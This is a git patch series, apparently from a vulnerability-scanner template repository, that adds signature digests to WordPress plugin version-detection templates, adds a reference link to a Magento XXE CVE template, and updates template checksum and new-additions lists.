4a0a0047304502202ea94e7d08b139c5859d40eda25e3de91df4f572ccab2ffcf2d397080943336c0221008ff287d752e7cffb24e04515a48015b5c12eca5bdfa61319961e3735679655fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..4af76b1a73 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff9cddce66f2c3e1e6ff9b28a6d56fb165156f4222376100903e4234dc825b4f022027ded33992c1de37f50664ab4b2abf1918d712bc2459f4036b12114b91fa025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..af83e6ba6f 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4b28851b0c042d7fb66c20838e9053d03fd5acb0f56efe1ebd72fdd6d24feab0221008c7cb9b9e91d1c6fc6c5b9bf82460744c244d11728d362104343208f9d4c99cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..b58f452fa9 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ff23dab8b01e58c49444b51d16ef5f51fd96a331e83bca4fcb2c1ac5414e9d8b022100ae26cbd8244b6d381476c7eb20c8d9b04cbbe98231522140e8f8d4fa8179c219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..c065be48af 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d52c1e2dbffded28eee83d24851a14b7ad491d94998fe8c1df4257575e660f3c022100d13a9aece14bfc0923b22470ca39f749f874bd3cecf9216e9515f6f1ecb2c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..5e7dca7e38 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206dcb6b3c7a6517b4391a9140b730283cdb8f98f117856375548a52d8b33ac2240220266506b26a932941de58bf87f9207ba98b618f38418cad1b6ff02d575cf06b75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..8f24ae366e 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062713231602615b01c4efa028f7924e8d79e0172a006582d108d06bf8e965c490220743b569047fac020498bc7850a3b74f820009a31f9a738c91f6591397d43c870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..bd0d4f39c0 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220740dc43515a03007264f5b2d1ecdfbdf5ab1bbed07d02c64e4478721b85a1873022100f9379900aea5aed2cb787e8b5e154a156267ff0f5e5060e082b137cafc6e4787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..8c014d247e 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220200926473e2f19cc852643c5a16455b5f9d068402e22ad5ff7f98607bc26e3b9022027295c1fc891ef800b127e534355430b0bb043542c5cfef1802acc5c9019383c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..7524bc9e40 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a86e4ebf21dc34233642c782becb95ff8ba66c9ac7d6b2edda0ede240fdfbd502202620e998347f53680c5aa97f038dcab6e3bc448d1d62fd35f74bdd124bfb2103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..e869b55714 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201acb87ed521548fcee6374979d308fc0c0db8462878a3cb762d03de522b179ff022050bcd8c3479f7f9e11f22b7d1ea32d308b65d683f416f424a067a9ad57cf7e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..4af5728352 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001cd5bb09d3028487bd784899a99148caf0d2a518c6af87a0c77a97bed56b84702204928b3bc3bbb4dc3dd381618846de6a1b3b39ccfeae6f395b4725ce5d6d7a53e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..ef9ed158ed 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c95241a69b3996ab095caeb7b588ca8a7b75fa12cf48699f12069eecac0c69f0221009fb1bae9308508ad337bb7edece1ce200396cbb64b76641bc1224bcc13c1bcc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..6d60c9d4ad 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077582c7cf95eb1e48b610befd961c9695747b013aafd86117d9f32fee200c65602207cc3c79dd66661f02231ce8c57dd3011c25c7769f1405ae291f8a2cd563dc21d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..3ef7fe35e8 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cec1597641501d897d90e85bb8c393e76ffb853646f1797b19938e4531a402b50220461567b9d9fa4e5a361ac0ae4ac004dcd4d19045f1cb5d52f4df4ae134ba092d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..fd830f0f99 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220745a0459821bb1af6effe13357e3f3c711b42026193020c2dddb8b8b03e1fc80022100f2393b9a8c6073dc39855a3b6566133dbda90a54f9b509a21a9ffeec5460b6ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..dae22332ec 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f3aae13f27a95daafdcf28c94c845e808a64ebbca774eadb8c701e7b3fea9f6022100bb54612d0573c4af2fdf17563b35f5ba9e74a9d07ea52b5e35f1ce18ec6d013d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..49fcf287f5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200fe2030b312e2fea73a5a3cc151079f30510c6875b5b4469490f866dd16e9f9d022100ea10a4c572db5d09f00bbad23ca96b5d864cebf140804634d900150925bdea8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..6ea9688142 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b42a86994e1cecd1b9bb059722f2293335b1c7f09e16d815dc9ded1e610dfa3022019ced94ef5b4bed9835a2e74ae2d8928e1332feaa97f5dd80415d38ae817b684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..d522b38494 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bfcd30eab8eaa15aaef16883c5b7c9847cfe2671db2631625563ed560ec2d9070220639068ff4c774c05aba8c725e53b04a7efbd5183d9c4cc581df23248f3d04cfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..9430f5add4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e8894d31dd768e239fa0b1d5458209af9b0c7d8536a9b0d12e3514d7cab7f38502205b947766382d88ea7dee3a699677bd4a51862d4042313d914e1d2214332cfec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..703e1b7ea9 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d2e00975103bd4e18299d6a479d4fdb1e8ba0300be6f3e195fec85c4a3837be022100c6f287ee4e7e7c0287321184aae27c5482027a997a8208944faa6ae58926ea57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4310f83744bd3520492a59d4ae261c5ec616d85a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 26 Jun 2024 14:35:05 +0530 Subject: [PATCH 0641/1841] reference addition --- http/cves/2024/CVE-2024-34102.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index eea563d83e..53523b3fe3 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -8,6 +8,7 @@ info: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. reference: - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md + - https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102 metadata: fofa-query: app="Adobe-Magento" verified: true @@ -39,4 +40,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100e6222a784967f5148b72e2585b0f394f446904586f8fe41c5fe7dc653e67d787022100c1a861f3f02ae0a37f8e0ae99dd731d946a0c00e0ca5f31a609d018e23104dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e6222a784967f5148b72e2585b0f394f446904586f8fe41c5fe7dc653e67d787022100c1a861f3f02ae0a37f8e0ae99dd731d946a0c00e0ca5f31a609d018e23104dd4:922c64590222798bb761d5b6d8e72950 From 37939928ea2e170ca46ddb526dd3de2664fd292c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 26 Jun 2024 09:10:34 +0000 Subject: [PATCH 0643/1841] Auto Template Signing [Wed Jun 26 09:10:34 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34102.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index 53523b3fe3..da821b1923 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -40,4 +40,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100e6222a784967f5148b72e2585b0f394f446904586f8fe41c5fe7dc653e67d787022100c1a861f3f02ae0a37f8e0ae99dd731d946a0c00e0ca5f31a609d018e23104dd4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022070921dac10cae36b2c23b2e02a100a75afb65d7f5274a4e5a5ec9c83980abcea02207396590bc55c847a284d02fda51a9d36fea759c5d1d950453a8a0bd177ed7042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9a406160c9de1b9210050dd42b1a8c6a7822d4b1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 26 Jun 2024 10:30:41 +0000 Subject: [PATCH 0644/1841] Auto Generated New Template Addition List [Wed Jun 26 10:30:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96428f5358..a31929f0e5 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/cves/2023/CVE-2023-41599.yaml http/cves/2024/CVE-2024-34102.yaml From 78ba9621bd66118942bb54bf68eeb59fd1f963eb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 26 Jun 2024 10:30:50 +0000 Subject: [PATCH 0645/1841] Auto Generated Templates Checksum [Wed Jun 26 10:30:50 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 818cc2e151..ad36acff0e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3253,6 +3253,7 @@ http/cves/2023/CVE-2023-41265.yaml:690ef3967f4a383b6de2fe9a099db2e10df9b132 http/cves/2023/CVE-2023-41266.yaml:f7a50a86eec6072d1c39c51f8ae0237d9de19b1e http/cves/2023/CVE-2023-4148.yaml:dd568e6c72619e2d55cc4ef764fc5944636c7946 http/cves/2023/CVE-2023-41538.yaml:4e735c71f54ac27baa8987be74e444bbe0f9775c +http/cves/2023/CVE-2023-41599.yaml:073234f82adb547fc355604bb6e1fac72a492a7b http/cves/2023/CVE-2023-41642.yaml:fbee72e0d62b6fa6c43e1bb34c5800412ac27d0e http/cves/2023/CVE-2023-4168.yaml:0006757cc3858b565e930fb9235b2269e59b1d64 http/cves/2023/CVE-2023-4169.yaml:639f6a6b20b2c228fb24159376e31c38682b5364 @@ -3442,7 +3443,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 -http/cves/2024/CVE-2024-34102.yaml:4778f433073e71b97ced201c299db534a6b7e5ed +http/cves/2024/CVE-2024-34102.yaml:1b7f00e3a39881ea8303c1e3b844907d7b4dcb66 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -7213,227 +7214,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:45bf2a55efe25a99b94abda7f454b8bffe39c6ca +http/technologies/wordpress/plugins/add-to-any.yaml:93e2eb051d4a8f94d659d93bb0087094431705fd +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df0a43836dbbb886f7a24c8e249fefbaeae90a96 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:e49a5940765ec7175a715cc72ff910e52961f559 +http/technologies/wordpress/plugins/akismet.yaml:d8c166ee7f0b19de5c5b7eb2cb33dcab2da03e02 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:ff666dc418cae616c44afd49bc604f65c8257df8 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c67e28c0659bf3501b8d20b768609ef926adf947 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:3faa3481b7ddf6dba9f391f4a945b5ebd1814fec +http/technologies/wordpress/plugins/amp.yaml:b05ce31ce9fb79bee99957789d8a984ff8c5b43b +http/technologies/wordpress/plugins/antispam-bee.yaml:3722fe75c8d9d1673834540a689cc31c7a65fe90 +http/technologies/wordpress/plugins/astra-sites.yaml:0ab7e95888dff6779d9b4b96683c3518ff2f196a http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:9e0e3f13cf9b85800f0ccfaf3c12937fb37b7179 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:90074a2b70acf7e376872cfe61cc5b1b9ce421a7 +http/technologies/wordpress/plugins/backwpup.yaml:986f5648a90ba8129aff143c783d5f9f2b50fd3b +http/technologies/wordpress/plugins/better-search-replace.yaml:e9907130dfd2b5fd59966f87ff83d41bf5071e4c +http/technologies/wordpress/plugins/better-wp-security.yaml:81fef33a133a80dff37041cb8172b3f09b9d82cb +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:54c72417ba072259dfc5296f59ec39a77dbc95ba +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:71ced6cf68403c01d3b948448596f43396989241 +http/technologies/wordpress/plugins/breeze.yaml:9e98a29a17621615588218fb12e2e2784cc7c832 +http/technologies/wordpress/plugins/broken-link-checker.yaml:63d1e7d319fa3e697f6d6fcb1a6f1024817bdb17 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3faabcdda55bf3d4e5812b4c5ede8e396c2cae6f +http/technologies/wordpress/plugins/classic-editor.yaml:c3b37158f78e69f26667b5d51868a0274b307de5 +http/technologies/wordpress/plugins/classic-widgets.yaml:9eaffdad9d8478b38443b0eb52353cf67cea356c +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:2c44bee53ad8b01ab71c7bce6a1d696a5879db79 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:5c0afd6a292327c030d9d187cc38c476deae12c4 +http/technologies/wordpress/plugins/coblocks.yaml:b320c702ad3bfe8b72e19a6086df8a692a7468e6 +http/technologies/wordpress/plugins/code-snippets.yaml:6ab800193f1c5e60625931874b017c44b5f5facb +http/technologies/wordpress/plugins/coming-soon.yaml:8c16543e8a56a90634e5a4f21362c25f36e353a5 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:bba47afa14136a394d7efe7686dd4f149efecbf3 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:47c5f357735b3a67e147c2f30da45269b33b1cfe +http/technologies/wordpress/plugins/contact-form-7.yaml:2c07fc0377a340d10578abe4dc93d9f692b1957a +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:84cf4c793ddd6ba6e4b1280eb14277803e5c2951 +http/technologies/wordpress/plugins/cookie-law-info.yaml:fea637b9a4a2f423b7f2755d0d4baea606d34315 +http/technologies/wordpress/plugins/cookie-notice.yaml:930b338ef7caeb805fc9cc07bada50ab73c9087b +http/technologies/wordpress/plugins/copy-delete-posts.yaml:92ba52ac674c230d3e613b46a8a7d6eef57743e8 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:e39e1ed0ee99d02b07bb3d542f7dbc2fbd773205 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:51678108308852feaef2a6c02090c25cd2c78039 +http/technologies/wordpress/plugins/custom-css-js.yaml:8e2cf98cee062fc90f24a7c704651bfc0f4dab8c +http/technologies/wordpress/plugins/custom-fonts.yaml:ffe36691d4fa9eba460947c3a101bd9f9d5c5f46 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e7859198588a801e0fb1c382c09348d1b7ffe4ec +http/technologies/wordpress/plugins/disable-comments.yaml:572ad46b6306c85ddcf91659fd4219edc3745d8d +http/technologies/wordpress/plugins/disable-gutenberg.yaml:1ccb9bc08a8dbfb91849f465f7c4ca7601cf7d15 +http/technologies/wordpress/plugins/duplicate-page.yaml:9e846989455fbb9c4f1223ec8d60b037555df26c 